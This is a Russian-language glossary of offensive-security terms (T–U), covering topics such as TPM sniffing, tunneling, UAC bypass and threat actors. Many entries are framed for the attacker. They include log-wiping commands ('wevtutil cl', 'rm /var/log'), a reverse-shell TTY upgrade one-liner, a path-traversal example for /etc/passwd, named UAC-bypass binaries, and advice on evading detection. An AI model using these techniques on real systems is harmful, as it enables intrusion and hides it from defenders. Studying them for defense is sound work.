TPM Sniffing Перехват ключей из TPM при загрузке системы. TPM хранит ключи шифрования (например, BitLocker) и передает их процессору при загрузке через шину LPC (Low Pin Count) или SPI (Serial Peripheral Interface). Подключив логический анализатор к шине (требует физического доступа и пайки), можно перехватить ключ. Используется для расшифровки зашифрованного диска (BitLocker) без пароля. Для защиты используется шина, защищенная от перехвата (например, в современных TPM 2.0), или использование ключа, не передаваемого по шине (например, сохранение в процессоре). TPM sniffing требует высокой квалификации и физического доступа.

Trace (Forensics) След (trace) в цифровой криминалистике: артефакты, оставленные в системе после действий (логи, временные файлы, записи в реестре, артефакты памяти, сетевые соединения). Для атакующего задача минимизировать следы: очищать логи (wevtutil cl), работать в памяти (memory-only), не писать на диск, использовать шифрование, уничтожать временные данные, не оставлять метаданных. В Linux следы могут оставаться в .bash_history, /var/log, ~/.ssh/known_hosts. В Windows в Prefetch, %TEMP%, Recent, $MFT.

Traceroute Утилита для определения маршрута следования пакетов от источника к узлу назначения. Traceroute отправляет пакеты с увеличивающимся TTL (Time To Live); каждый маршрутизатор на пути уменьшает TTL и при TTL=0 возвращает ICMP Time Exceeded. Traceroute используется в сетевой разведке (network reconnaissance) для: определения топологии сети, выявления межсетевых экранов (firewalls), поиска альтернативных путей. Для атакующего traceroute часть энумерации сети после initial access.

Tracking (User) Отслеживание пользователей (user tracking) сбор информации о действиях пользователя: cookies, fingerprint (отпечаток браузера), геолокация, история посещений, поведенческие паттерны. Для атакующего tracking используется для: OSINT (сбор информации о цели), социальной инженерии (знание привычек), фишинга (таргетирование). Для защитников tracking обнаружение аномалий (поведенческий анализ). В контексте атакующих пользовательское отслеживание может быть целью (кража данных о пользователях из SaaS-систем).

Trademark (Phishing) Фишинговые сайты, имитирующие легитимные бренды (банки, социальные сети, онлайн-магазины) для кражи учетных данных. Товарный знак (trademark) используется для создания доверия: поддельный сайт копирует логотип, дизайн, URL (typosquatting, subdomain takeover). Для защиты используются: регистрация товарных знаков (для борьбы с подделками), DMCA (Digital Millennium Copyright Act), мониторинг доменов.

Traffic Analysis Анализ сетевого трафика (traffic analysis) метод обнаружения C2, эксфильтрации, аномалий без расшифровки содержимого. Анализируются: объем трафика (пики), частота соединений (heartbeat), направления (исходящие соединения), размеры пакетов, временные паттерны. Для атакующего traffic analysis угроза: нужно имитировать легитимный трафик (low & slow, рабочие часы, случайные интервалы), использовать шифрование, обфусцировать паттерны.

Traffic Shaping Управление трафиком (traffic shaping) метод контроля пропускной способности, приоритизации трафика. Используется защитниками для: ограничения DDoS-трафика, приоритизации легитимных приложений, QoS (Quality of Service). Для атакующего traffic shaping препятствие: вредоносный трафик может быть ограничен, замедлен, отброшен. Для обхода используется: маскировка под легитимный трафик (HTTPS, DNS), использование разрешенных протоколов, изменение портов.

Train (AI) Обучение AI-модели (training). Model poisoning отравление обучающих данных (training data poisoning) атака на AI, при которой злоумышленник внедряет вредоносные данные в обучающий набор, чтобы модель давала неверные результаты (например, пропускала малварь). Для атакующего model poisoning способ скомпрометировать защитные системы (EDR на основе ML), если есть доступ к обучающим данным.

Transaction (Blockchain) Транзакция в блокчейне запись о переводе криптовалюты или выполнении смарт-контракта. Транзакция содержит: отправитель (адрес), получатель, сумма, газ (комиссия), подпись (с приватным ключом). Flash loan транзакция, где заем и возврат происходят в рамках одной транзакции. Для атакующего blockchain transaction инструмент для: перемещения средств, отмывания (Monero), атак на DeFi (flash loan, oracle manipulation).

Transfer (File) Передача файлов (file transfer) перемещение данных между системами. Методы: FTP, SCP, SFTP, HTTP, SMB, rsync, облачные сервисы (MEGA, Dropbox). Используется атакующими для: эксфильтрации данных (exfiltration), загрузки инструментов (staging), передачи ключей. Для скрытности используется шифрование (TLS), low & slow, легитимные сервисы (Google Drive, S3).

Transparency (Logging) Прозрачность логирования (transparency) принцип, согласно которому система должна логировать все значимые события, а логи должны быть доступны для аудита и не подлежать удалению. Для атакующего прозрачность угроза: каждое действие оставляет след. Для обхода используется: работа в памяти (memory-only), отключение логирования (ETW unhooking), удаление логов после операции (wevtutil cl, rm /var/log), подмена логов (log injection).

Transport Layer Security (TLS) Протокол шифрования (Transport Layer Security, преемник SSL), обеспечивающий конфиденциальность и целостность передачи данных между клиентом и сервером. TLS используется для: HTTPS (веб-трафик), защищенной почты (SMTPS, IMAPS), VPN (OpenVPN, WireGuard), C2 (Command and Control). TLS работает поверх TCP, использует сертификаты для аутентификации сервера (и опционально клиента). Для атакующего TLS инструмент для сокрытия C2-трафика: шифрованный трафик выглядит как обычный HTTPS, проходит через firewalls, не анализируется DPI без расшифровки.

Trap (Honeypot) Ловушка (honeypot) система, выглядящая как уязвимая цель, но на самом деле логирующая действия атакующего. Для атакующего trap риск: потратить время на фальшивую цель, раскрыть свои инструменты и TTPs. Признаки honeypot: слишком легкий доступ, аномально высокая активность, отсутствие реальных данных, искусственные имена хостов.

Trapdoor (Backdoor) Потайная дверь (backdoor) скрытый доступ в систему. Синоним backdoor.

Traversal (Directory) Directory traversal (path traversal) уязвимость, позволяющая читать файлы за пределами веб-корня, используя последовательности "../". Пример: https://site.com/getfile?file=../../../../etc/passwd. Используется для кражи файлов конфигурации (.env, config.php), исходного кода, паролей, ключей.

Triad (CIA) Триада безопасности CIA (Confidentiality, Integrity, Availability). Атакующий нарушает все три: кража данных (confidentiality), модификация (integrity), уничтожение или шифрование (availability). Handala нарушила все три: конфиденциальность (50TB данных), целостность (изменение конфигураций Intune), доступность (200k устройств wiped).

Triage (Incident) Сортировка инцидентов (triage) процесс приоритизации алертов в SOC: определение, какие алерты требуют немедленного реагирования (critical), какие могут подождать (high), какие являются ложными срабатываниями (false positive). Для атакующего triage союзник, если атака выглядит как легитимная активность (behavioral blending), она может быть низко приоритезирована.

Trojan Троян (троянский конь) программа, маскирующаяся под легитимное ПО, но выполняющая вредоносные действия. Типы: RAT (Remote Administration Tool), banking trojan (кража банковских данных), infostealer (кража паролей), dropper (загрузка другой малвари). Распространяется через фишинг, crack-сайты, malvertising. В отличие от вируса, троян не размножается самостоятельно.

Trojan Horse См. Trojan. Троян (троянский конь) программа, маскирующаяся под легитимное ПО, но выполняющая вредоносные действия. Типы: RAT (Remote Administration Tool), banking trojan, infostealer, dropper. Распространяется через фишинг, crack-сайты, malvertising. В отличие от вируса, троян не размножается самостоятельно.

Troubleshooting Поиск и устранение неисправностей (troubleshooting). В контексте атак troubleshooting используется как pretext для социальной инженерии: звонок "я из техподдержки, помогаю решить проблему", просьба установить RMM (AnyDesk, TeamViewer), сбросить MFA. The Com использует troubleshooting как предлог для vishing.

True Promise-4 17-я волна иранских ракетных ударов (4 марта 2026) в ответ на операцию Epic Fury (США/Израиль). Гиперзвуковые ракеты пробили THAAD (Terminal High Altitude Area Defense), уничтожены радарные системы, нанесены удары по Бен-Гуриону. В контексте атак True Promise-4 пример координации кибератак (Handala, MuddyWater) с кинетическими ударами (cyber-kinetic convergence). MuddyWater взламывал IP-камеры для наведения ракет (battle damage assessment).

TruffleHog Инструмент с открытым кодом для поиска секретов (API-ключей, паролей, токенов) в Git-репозиториях. TruffleHog сканирует историю коммитов, ищет высокоэнтропийные строки (ключи), проверяет на валидность (например, AWS-ключи через API). Используется атакующими для OSINT (поиск утекших ключей на GitHub) и защитниками для аудита своих репозиториев.

Trust (Zero) Zero Trust (нулевое доверие) модель безопасности, не доверяющая никому по умолчанию, требующая аутентификации и авторизации для каждого доступа (внутри сети и извне). Компоненты: микросегментация, непрерывная проверка, least privilege. Для атакующего Zero Trust серьезное препятствие: даже получив доступ к одному узлу, нельзя свободно двигаться; нужно компрометировать identity (OAuth, SAML) или находить уязвимости в политиках.

Trust Relationship Доверительные отношения (trust relationship) между доменами Active Directory, между системами, между приложениями (OAuth). Атакующие используют доверительные отношения для lateral movement: из одного домена в другой (если установлено доверие), из on-prem в cloud (AADConnect), между приложениями (over-privileged OAuth). ShinyHunters использует over-privileged integrations (доверительные отношения между Salesforce и Okta).

Trusted Platform Module (TPM) Аппаратный модуль (чип) для криптографических операций и безопасного хранения ключей (Trusted Platform Module). TPM используется для: BitLocker (хранение ключа шифрования диска), Secure Boot (проверка подписи загрузчика), аутентификации (хранение PIN, биометрических данных). TPM может хранить ключи так, что они не могут быть извлечены программно (только использование через API). Для атакующего TPM препятствие: ключи BitLocker могут быть извлечены только через TPM sniffing (физический доступ к шине LPC или SPI), cold boot attack (извлечение ключа из памяти до загрузки), или атаку на TPM (уязвимости в реализации).

TSC (Timestamp Counter) Счетчик времени процессора (Timestamp Counter) регистр, подсчитывающий количество тактов процессора. Используется в timing attacks (side-channel) для измерения времени выполнения операций с высоким разрешением. В Windows QueryPerformanceCounter использует TSC. Для атакующего TSC инструмент для измерения времени (например, в timing attacks), для защитников источник энтропии.

TSIG (Transaction Signature) Механизм подписи DNS-транзакций (Transaction SIGnature) для аутентификации обновлений DNS (DNS UPDATE) и передачи зон (zone transfer). TSIG использует общий секретный ключ (shared secret). Для атакующего TSIG препятствие для DNS hijacking и несанкционированного обновления записей, если ключ не украден.

TTPs (Tactics, Techniques, and Procedures) Тактики, техники, процедуры способы, которыми атакующие проводят атаки. MITRE ATT&CK классифицирует TTPs. Для защитников знание TTPs помогает строить детекты. Для атакующего изменение TTPs способ избежать детекции (например, использование новых техник, не включенных в ATT&CK, или комбинация редко используемых).

TTY (Teletypewriter) Терминал (teletypewriter) в Linux/Unix устройство для ввода-вывода, ассоциированное с терминалом. Reverse shell часто не имеет TTY (нет интерактивности, нет командной строки, нет обработки сигналов). Для получения полноценной интерактивной оболочки (с возможностью su, sudo, редакторов) требуется выделение TTY: python -c 'import pty; pty.spawn("/bin/bash")', или script /dev/null -c bash, или stty raw -echo.

TU (Traffic Unit) Единица измерения трафика (Traffic Unit). В контексте атак TU может встречаться в метриках сетевого трафика (например, при анализе объема эксфильтрации). Не является ключевым термином.

Tunnel Туннель (tunnel) инкапсуляция одного протокола в другой для обхода фильтров, скрытия трафика, создания виртуальных сетей. Типы: VPN (IPsec, OpenVPN), SSH tunnel (port forwarding), DNS tunnel, ICMP tunnel, HTTP tunnel, WebSocket tunnel. Используется для: C2 (агент туннелирует трафик через легитимные протоколы), эксфильтрации (вывоз данных через DNS), обхода firewalls.

Tunnel (DNS) DNS-туннель туннелирование данных через DNS-протокол. DNS-запросы и ответы содержат данные, закодированные в поддоменах или в TXT-записях. Инструменты: iodine, dnscat2. DNS-туннели используются для C2 и эксфильтрации, когда другие протоколы (HTTP, HTTPS) заблокированы. Обнаруживается по аномальному объему DNS-трафика, длинным запросам, нестандартным типам запросов.

Tunnel (HTTP) Туннелирование через HTTP-протокол. HTTP-туннель обычно реализуется через метод CONNECT, который используется для проксирования HTTPS-трафика. Клиент отправляет CONNECT target:443 HTTP/1.1, прокси устанавливает TCP-соединение с target и затем прозрачно передает данные. Для C2 атакующие используют HTTP-туннели для передачи команд и результатов, маскируя трафик под легитимный веб-трафик. Также HTTP-туннели могут быть реализованы через WebSocket (HTTP upgrade). Инструменты: Chisel, HTTPTunnel, reGeorg. Преимущество: HTTP(S) трафик почти всегда разрешен, проходит через прокси, не вызывает подозрений.

Tunnel (ICMP) Техника туннелирования, при которой данные передаются внутри ICMP-пакетов (Internet Control Message Protocol), обычно в Echo Request (пинг) и Echo Reply (ответ на пинг). ICMP это протокол диагностики сети, который редко блокируется корпоративными файрволами (иначе не работал бы ping), и часто не подвергается глубокой инспекции (DPI). Атакующий кодирует команды или украденные данные в поле данных ICMP-пакета, отправляет их на свой C2-сервер, и получает ответы, также закодированные в ICMP. Инструменты для ICMP-туннелирования: icmptunnel, ptunnel, pingtunnel, а также кастомные реализации. ICMP-туннели используются для C2 (Command and Control) и эксфильтрации данных в сетях, где HTTP/HTTPS и DNS заблокированы или строго фильтруются. Обнаруживается ICMP-туннель по аномальному объему ICMP-трафика (обычный ping 2-3 пакета в минуту, туннель сотни пакетов в секунду), аномальному размеру пакетов (обычный ping 64 байта, туннель до 1500 байт), аномальной частоте, искаженным ICMP-заголовкам. Для защиты используется ограничение ICMP-трафика на файрволе (разрешить только ping внутри сети, запретить наружу) и DPI, анализирующее содержимое ICMP-пакетов на предмет кодированных данных.

Tunnel (SSH) Туннелирование через SSH (Secure Shell). SSH-туннель позволяет перенаправлять сетевой трафик через зашифрованное SSH-соединение. Три основных типа: локальный (local forwarding) клиент перенаправляет локальный порт на удаленный сервер (например, ssh -L 8080:internal-server:80 user@gateway трафик на localhost:8080 идет через gateway на internal-server:80); удаленный (remote forwarding) клиент перенаправляет порт на сервере на свой локальный порт (ssh -R 8080:localhost:80 user@gateway доступ к порту 8080 на gateway идет на localhost:80 клиента); динамический (dynamic forwarding) создает SOCKS-прокси (ssh -D 1080 user@gateway), через который можно направлять трафик любых приложений. SSH-туннели используются атакующими для: обхода файрволов (доступ к внутренним сервисам), сокрытия C2-трафика (весь трафик выглядит как SSH), эксфильтрации (передача данных через SSH), создания backdoor (remote forwarding позволяет атакующему получать доступ к системе изнутри, даже если нет прямого соединения).

Tunnel (VPN) Туннель виртуальной частной сети (Virtual Private Network). VPN создает зашифрованное соединение между устройством и VPN-сервером, скрывая IP-адрес и шифруя весь трафик. Протоколы: OpenVPN (UDP/TCP, популярен), WireGuard (современный, быстрый), IPsec (стандарт для корпоративных VPN), L2TP/IPsec (устаревающий), SSTP (Microsoft). Для атакующего VPN инструмент для анонимизации (скрытие реального IP), обхода геоблокировок, защиты от перехвата трафика (ISP, law enforcement). Однако VPN-провайдеры могут логировать активность (дата подключения, IP-адрес) и сотрудничать с правоохранительными органами. Для повышения анонимности атакующие используют nested VPN (VPN через VPN) или VPN + Tor (Tor over VPN или VPN over Tor). В корпоративных сетях VPN точка входа (initial access), если скомпрометированы учетные данные.

Tunneling (Protocol) Протокольное туннелирование общий термин для инкапсуляции одного сетевого протокола внутри другого. Цели: обход фильтров (firewalls), скрытие трафика, объединение сетей. Примеры: IP-in-IP (IP-пакет внутри IP-пакета), GRE (Generic Routing Encapsulation), VXLAN (виртуализация сетей), MPLS (мультипротокольная коммутация). В контексте атак протокольное туннелирование используется для сокрытия C2-трафика (например, ICMP-туннель, DNS-туннель) и для создания covert-каналов (скрытых каналов связи), где данные передаются внутри легитимных протоколов.

TURLA Turla (также известна как Snake, Uroburos, Venomous Bear) APT-группа, связанная с российскими спецслужбами (ФСБ). Активна с 1996 года, специализируется на шпионаже против правительственных организаций, дипломатических служб, военных, научных учреждений по всему миру. Turla известна сложными инструментами: Snake (модульный backdoor, peer-to-peer C2, работал на Windows и Linux), Carbon (C2), Uroburos (rootkit). Turla использовала атаки на спутниковую связь (спутниковые тарелки для C2), перехват обновлений ПО (замена легитимных обновлений). В 2026 Turla остается активной, с новыми инструментами и TTPs.

TV (Television) Телевидение. В контексте атак телевидение может быть целью в нескольких аспектах: 1) Взлом умных телевизоров (Smart TV) устройства на Android TV, Tizen, WebOS имеют уязвимости (RCE через веб-интерфейс, Bluetooth, Wi-Fi). Умные телевизоры могут быть частью ботнета (Mirai), использоваться для шпионажа (встроенные камеры, микрофоны), как точка входа в домашнюю сеть. 2) Взлом кабельного/спутникового вещания нарушение вещания, инъекция контента (дезинформация). 3) Операции влияния (influence operations) распространение дезинформации через телеканалы (взлом или использование подконтрольных СМИ). В 2026 умные телевизоры в корпоративных средах (конференц-залы) могут быть точкой входа в сеть.

TWAIN (Technology Without An Interesting Name) Протокол и API для взаимодействия со сканерами, камерами и другими устройствами захвата изображений. TWAIN используется в медицинских системах (оцифровка документов), офисных сканерах. Уязвимости в TWAIN-драйверах (buffer overflow) могут привести к выполнению кода (RCE) на системе с подключенным сканером. В контексте атак не является ключевым вектором, но может встретиться при пентесте медицинских или офисных систем.

Two-Factor Authentication (2FA) Двухфакторная аутентификация метод аутентификации, требующий двух факторов из трех категорий: знание (пароль, PIN), владение (токен, телефон, аппаратный ключ), биометрия (отпечаток, лицо). 2FA значительно повышает безопасность, но не является абсолютной защитой. Методы обхода 2FA в 2026: vishing (звонок в helpdesk с просьбой сбросить MFA), AiTM (Adversary-in-the-Middle перехват сессии), SIM-swapping (перенос номера для перехвата SMS), session hijacking (кража cookies аутентифицированной сессии), MFA fatigue (многократные push-уведомления, пока жертва не нажмет Approve), эксплуатация уязвимостей (например, bypass в реализации TOTP). The Com специализируется на обходе 2FA через helpdesk: звонят как "сотрудник, потерявший доступ", убеждают сбросить MFA.

Two-Phase Commit (2PC) Протокол двухфазной фиксации (two-phase commit) алгоритм для обеспечения атомарности распределенных транзакций в базах данных, системах управления файлами. Фаза 1 (prepare): координатор запрашивает все узлы, готовы ли они зафиксировать транзакцию. Фаза 2 (commit/rollback): если все узлы готовы координатор отправляет commit, иначе rollback. В контексте атак 2PC может быть целью для DoS (зависание транзакций), атак на консистентность, или использования как вектора для атаки на распределенные системы (например, нарушение работы базы данных). Не является ключевым вектором для типичных атак.

TX (Transmit) Передача (transmit) в сетевом контексте: отправка данных. В контексте атак TX может относиться к: передаче данных в C2 (TX от агента к C2), эксфильтрации (TX украденных данных), каналу связи. В радиосвязи TX передатчик (transmitter). В логах сетевых устройств TX может обозначать количество отправленных пакетов (tx bytes, tx packets), что используется для анализа аномалий.

TXT Record (DNS) TXT-запись в DNS тип записи, содержащий произвольный текст (строка, ограниченная 255 байтами, может быть объединена из нескольких). Используется для: SPF (Sender Policy Framework) указание разрешенных почтовых серверов для домена; DKIM (DomainKeys Identified Mail) публичный ключ для проверки подписи писем; DMARC (Domain-based Message Authentication) политика обработки писем, не прошедших проверку; verification подтверждение владения доменом для Google, Microsoft, AWS; C2 (Command and Control) атакующие размещают в TXT-записях закодированные команды или адреса C2, агенты делают DNS-запросы и извлекают данные; эксфильтрация кодирование украденных данных в TXT-записях (через DNS-сервер атакующего). TXT-записи популярный канал для скрытой коммуникации, так как DNS-трафик редко фильтруется и проверяется.

Typosquatting Тайпсквоттинг (typosquatting) регистрация доменных имен, похожих на легитимные, с расчетом на опечатки пользователей. Примеры: gooogle.com (вместо google.com), facebооk.com (с кириллической 'о'), microsoft-support.com. Используется для: фишинга (жертва попадает на поддельный сайт, вводит учетные данные), распространения малвари (скачивание "обновления" с похожего домена), подмены бренда. В supply chain атаках typosquatting используется для публикации вредоносных пакетов с похожими именами в репозиториях (PyPI, npm, RubyGems). Разработчик, ошибившись в имени пакета (например, requets вместо requests), скачивает вредоносный пакет, который крадет данные или устанавливает backdoor. В 2026 typosquatting остается эффективным методом.

U

U2F (Universal 2nd Factor) Открытый стандарт для аппаратных ключей двухфакторной аутентификации (YubiKey, Google Titan, SoloKey). U2F использует криптографию с публичным ключом: при регистрации устройство генерирует ключевую пару, приватный ключ хранится на ключе, публичный на сервере. При аутентификации сервер отправляет challenge, ключ подписывает его приватным ключом, подпись проверяется сервером. U2F устойчив к фишингу (AiTM), потому что подпись привязана к конкретному домену (origin) и не может быть переиспользована на другом сайте. Для атакующего U2F серьезное препятствие: обход требует физического доступа к ключу, уязвимостей в реализации (side-channel), или атаки на helpdesk (сброс MFA). В 2026 U2F вытесняется FIDO2 (WebAuthn), который поддерживает пароли без пароля (passwordless).

UAC (User Account Control) Механизм контроля учетных записей в Windows, запрашивающий подтверждение при действиях, требующих прав администратора. UAC работает в нескольких режимах: всегда уведомлять (по умолчанию), уведомлять только при изменении настроек Windows, никогда не уведомлять (отключено). UAC не является барьером безопасности (его можно обойти), но затрудняет автоматическое выполнение вредоносных действий без взаимодействия с пользователем. UAC bypass техника обхода запроса подтверждения для выполнения действий с повышенными привилегиями без согласия пользователя. Методы UAC bypass: использование доверенных исполняемых файлов (fodhelper.exe, eventvwr.exe, sdclt.exe), манипуляции с реестром, COM-объекты. Используется для LPE (Local Privilege Escalation) из обычного пользователя в администратора без пароля.

UAC Bypass Обход User Account Control (UAC) для выполнения действий с повышенными привилегиями без появления запроса на подтверждение. UAC bypass не дает прав SYSTEM, только администратора (если пользователь входит в группу администраторов). Методы: использование утилит, которые автоматически повышают права (например, fodhelper.exe, eventvwr.exe, sdclt.exe), манипуляция реестром (изменение ключей, которые читаются приложением с повышенными правами), COM-объекты, которые запускаются с правами администратора. После успешного UAC bypass можно выполнить код с правами администратора, что позволяет отключить Defender, установить драйверы, дампить LSASS. UAC bypass используется для LPE, когда у пользователя есть права администратора, но включен UAC.

UART (Universal Asynchronous Receiver-Transmitter) Универсальный асинхронный приемопередатчик аппаратный интерфейс для последовательной связи (RS-232, TTL). UART используется в embedded-системах (роутеры, IoT, промышленные контроллеры) для отладки, загрузки прошивки, консольного доступа. В физическом пентесте UART точка доступа: на печатной плате устройства могут быть контактные площадки (TX, RX, GND) для подключения к UART. Подключившись (через USB-UART адаптер), можно получить доступ к консоли загрузчика (bootloader) или shell операционной системы, часто с root-правами. UART используется для: извлечения прошивки, сброса паролей, изменения конфигурации, установки backdoor.

UAT (User Acceptance Testing) Пользовательское приемочное тестирование этап тестирования ПО перед внедрением. UAT-среды часто имеют ослабленную защиту (слабые пароли, отсутствие MFA) и содержат копии production-данных (иногда реальные данные клиентов). Для атакующего UAT-среда цель: компрометация UAT может дать доступ к данным, а также может быть использована для pivot в production (если UAT и production имеют доверительные отношения). ShinyHunters ищет misconfig в тестовых средах.

UAT (User Account Termination) Процесс отзыва доступа у уволенных сотрудников. Неполная или несвоевременная UAT уязвимость: учетные записи бывших сотрудников остаются активными. Для атакующего поиск неотключенных учетных записей (особенно привилегированных) часть post-exploitation.

UBA (User Behavior Analytics) Аналитика поведения пользователей системы, использующие ML для обнаружения аномалий: необычное время входа, новое местоположение, нехарактерные действия (например, скачивание большого объема данных). UBA используется в SIEM, EDR. Для атакующего UBA угроза: нужно имитировать легитимное поведение (behavioral blending): работать в рабочие часы, с привычного IP (через прокси), действовать как обычный пользователь, а не как администратор, если это нехарактерно.

UBI (User-Based Interface) Интерфейс на основе пользователя (User-Based Interface). В контексте атак не является термином.

UDP (User Datagram Protocol) Протокол дейтаграмм пользователя транспортный протокол без установки соединения, без гарантии доставки, порядка пакетов, контроля ошибок. UDP используется для: DNS (порт 53), DHCP (67/68), SNMP (161), VoIP (RTP), видеотрансляций, игр. В C2 UDP используется реже, чем TCP, из-за ненадежности, но может быть использован для: DNS-туннелей, ICMP-туннелей (поверх UDP), быстрых DDoS-атак (UDP flood). UDP-трафик сложнее фильтровать, чем TCP, но аномалии (высокий объем, нестандартные порты) могут быть обнаружены.

UDP Flood DoS-атака, отправляющая большое количество UDP-пакетов на случайные порты целевого сервера. Сервер тратит ресурсы на проверку, кому принадлежат порты, и отвечает ICMP Destination Unreachable. UDP flood используется в DDoS-атаках, часто в комбинации с IP spoofing. Для защиты используются rate limiting, фильтрация, балансировщики.

UEBA (User and Entity Behavior Analytics) Расширение UBA, включающее не только пользователей, но и сущности (серверы, сервисы, IoT). UEBA используется для обнаружения компрометации учетных записей, lateral movement, инсайдерских угроз. Для атакующего UEBA угроза: аномалии в поведении сервисов (например, сервер начинает сканировать порты) могут быть обнаружены.

UEFI (Unified Extensible Firmware Interface) Современный стандарт прошивки, заменяющий BIOS. UEFI поддерживает: загрузку с дисков более 2 ТБ, Secure Boot (проверка подписи загрузчика), графический интерфейс, сетевую загрузку (PXE). Для атакующего UEFI цель для firmware persistence: запись малвари в UEFI (капсулу) позволяет ей выполняться при каждой загрузке, до операционной системы, и переживать переустановку ОС. Пример: LoJax (APT28) первая обнаруженная UEFI-малварь. Уязвимости UEFI: слабая реализация Secure Boot (можно загрузить неподписанный код), ошибки в драйверах, возможность отключения через физический доступ.

UEFI Capsule Капсула UEFI обновление прошивки в формате, который может быть применен UEFI. Атакующий может создать вредоносную капсулу (с малварью) и загрузить ее через механизмы обновления (Windows Update, утилиты производителя). Если система не проверяет подпись капсулы должным образом, можно установить вредоносную прошивку.

UEFI Runtime Services Сервисы UEFI, доступные после загрузки ОС (например, изменение переменных UEFI, перезагрузка). Атакующий может использовать Runtime Services для persistence: запись в переменные UEFI, которые будут считаны при следующей загрузке.

UEFI Secure Boot Компонент UEFI, проверяющий цифровую подпись загрузчика (bootloader) перед выполнением. Secure Boot предотвращает загрузку неподписанного кода (bootkits, rootkits). Для атакующего Secure Boot препятствие: нужно иметь подписанный загрузчик (через уязвимости в shim, или украденные ключи) или отключать Secure Boot (через физический доступ к UEFI). В корпоративных средах Secure Boot часто включен, но может быть отключен администраторами.

UFW (Uncomplicated Firewall) Простой межсетевой экран для Linux (обертка над iptables). UFW используется для управления правилами (разрешить/запретить порты, IP). Для атакующего UFW препятствие: если настроен правильно, блокирует обратные соединения (reverse shell). Обход: использование разрешенных портов (80, 443), DNS-туннели, ICMP-туннели.

UID (User Identifier) Идентификатор пользователя в Unix/Linux (числовой). UID 0 root. UID используется для определения прав доступа к файлам, процессам. Для атакующего получение UID 0 цель LPE. SUID-бинарники с UID 0 выполняются с правами root независимо от запустившего пользователя.

UL (Underwriters Laboratories) Организация по сертификации безопасности продукции (Underwriters Laboratories). UL сертифицирует электронику, пожарную безопасность. В контексте атак UL может упоминаться в документации, но не является термином.

UM (User Mode) Режим пользователя (user mode) в Windows/Linux уровень привилегий, на котором работают обычные приложения. В отличие от kernel mode, user mode не имеет прямого доступа к аппаратуре, ограничен в доступе к памяти других процессов. Для атакующего user mode начальный уровень после initial access. LPE (Local Privilege Escalation) переход из user mode в kernel mode или SYSTEM.

UMA (Unified Memory Architecture) Архитектура с общей памятью между CPU и GPU. В контексте атак UMA может быть целью для side-channel атак (например, извлечение данных из памяти GPU).

UML (Unified Modeling Language) Язык визуального моделирования. В контексте атак UML может использоваться для моделирования attack paths (диаграммы последовательностей атак). Не является ключевым термином.

UMPC (Ultra-Mobile Personal Computer) Ультрамобильный ПК (Ultra-Mobile Personal Computer) форм-фактор ноутбуков (Sony Vaio UX, OQO). В контексте атак не является термином.

UMS (User-Mode Scheduling) Планирование потоков в пользовательском режиме (Windows). UMS может быть использован для создания скрытых потоков (stealth threads) в малвари.

UNC (Uniform Naming Convention) Формат пути к сетевым ресурсам в Windows: \\server\share\file. UNC используется в SMB. Для атакующего UNC способ: заставить приложение обратиться к UNC-пути (через ссылку в документе, инъекцию в лог), что приведет к NTLM-аутентификации, и хэш может быть захвачен (responder). Также UNC может использоваться для загрузки малвари с SMB-шары атакующего.

UNC Path Injection Внедрение UNC-пути в поле, которое будет открыто приложением (например, в лог, в настройки). Приложение обращается к UNC-пути, отправляя NTLM-хэш текущего пользователя. Используется для захвата хэшей (responder) в локальной сети.

Unicode Стандарт кодирования символов. В атаках Unicode используется для: обхода фильтров (путем кодирования вредоносных символов), RLO (Right-to-Left Override) маскировка расширений файлов (например, exe отображается как txt). Unicode-нормализация может приводить к уязвимостям (например, переполнение буфера).

Unicode Normalization Процесс приведения Unicode-строк к каноническому виду. Уязвимости в нормализации могут привести к: обходу фильтров (например, \uFF2F\uFF2F вместо //), DoS (экспоненциальное увеличение длины). В веб-приложениях может использоваться для bypass проверок.

Unicode RLO (Right-to-Left Override) Символ Unicode U+202E, меняющий направление отображения текста (для языков с письмом справа налево). Используется в фишинге для маскировки расширений файлов: имя exe может быть отображено как txt. Пример: malicious\u202Ecod.exe отображается как maliciousexe.doc (последние символы переставлены). Используется для обмана пользователей, заставляя открыть вредоносный файл.

Unified Extensible Firmware Interface (UEFI) Современный стандарт прошивки, заменяющий BIOS (Unified Extensible Firmware Interface). UEFI поддерживает: загрузку с дисков более 2 ТБ, Secure Boot (проверка подписи загрузчика), графический интерфейс, сетевую загрузку (PXE). Для атакующего UEFI цель для firmware persistence: запись малвари в UEFI (капсулу) позволяет ей выполняться при каждой загрузке, до операционной системы, и переживать переустановку ОС. Пример: LoJax (APT28) первая обнаруженная UEFI-малварь.

Unified Kill Chain Расширенная модель Cyber Kill Chain, объединяющая фазы атаки до, во время и после компрометации. Включает: reconnaissance, weaponization, delivery, exploitation, persistence, defense evasion, command & control, execution, lateral movement, privilege escalation, data exfiltration, impact. Используется для анализа APT-атак.

Unikernel Специализированное ядро (unikernel), компилируемое вместе с приложением для запуска на гипервизоре. Unikernel используются в высокопроизводительных облачных средах (например, MirageOS, OSv). Уязвимости unikernel могут привести к компрометации гипервизора (VM escape) и другим атакам. В контексте атак unikernel узкая область, но может быть целью для атак на облачные среды.

Union-Based SQL Injection Тип SQL-инъекции, использующий оператор UNION для объединения результатов легитимного запроса с результатами вредоносного. Требует, чтобы исходный запрос возвращал данные (не blind). Атакующий определяет количество столбцов (ORDER BY), затем использует UNION SELECT для извлечения данных (базы, таблицы, записи). Union-based SQLi быстрее, чем blind, но требует, чтобы результаты выводились на страницу.

UNIX Семейство операционных систем (Linux, BSD, macOS). Для атакующего UNIX-системы цели: LPE (Dirty COW, CVE-2021-3156), persistence (SSH-ключи, crontab), C2 (reverse shell). Инструменты: Metasploit, Cobalt Strike поддерживают UNIX.

Unpatched Vulnerability Неисправленная уязвимость (отсутствует патч). Для атакующего unpatched vulnerability возможность для initial access, LPE, lateral movement. Период между выходом патча и его установкой (patch gap) окно для эксплуатации 1-day. Interlock имел 36 дней zero-day window, затем еще время, пока патч устанавливался.

Unprivileged User Непривилегированный пользователь (обычный пользователь, без прав администратора). Для атакующего initial access часто дает права unprivileged user. LPE (Local Privilege Escalation) переход к SYSTEM или root.

Unquoted Service Path Уязвимость в Windows, когда путь к службе (в реестре) не заключен в кавычки, а путь содержит пробелы. Пример: C:\Program Files\MyApp\service.exe. Windows интерпретирует C:\Program.exe как попытку запуска из C:\Program Files. Если в C:\ есть Program.exe (вредоносный), он будет запущен вместо легитимной службы. Используется для LPE.

Uplink Восходящий канал связи (от клиента к серверу, от локальной сети к интернету). В контексте C2 uplink канал от агента к C2.

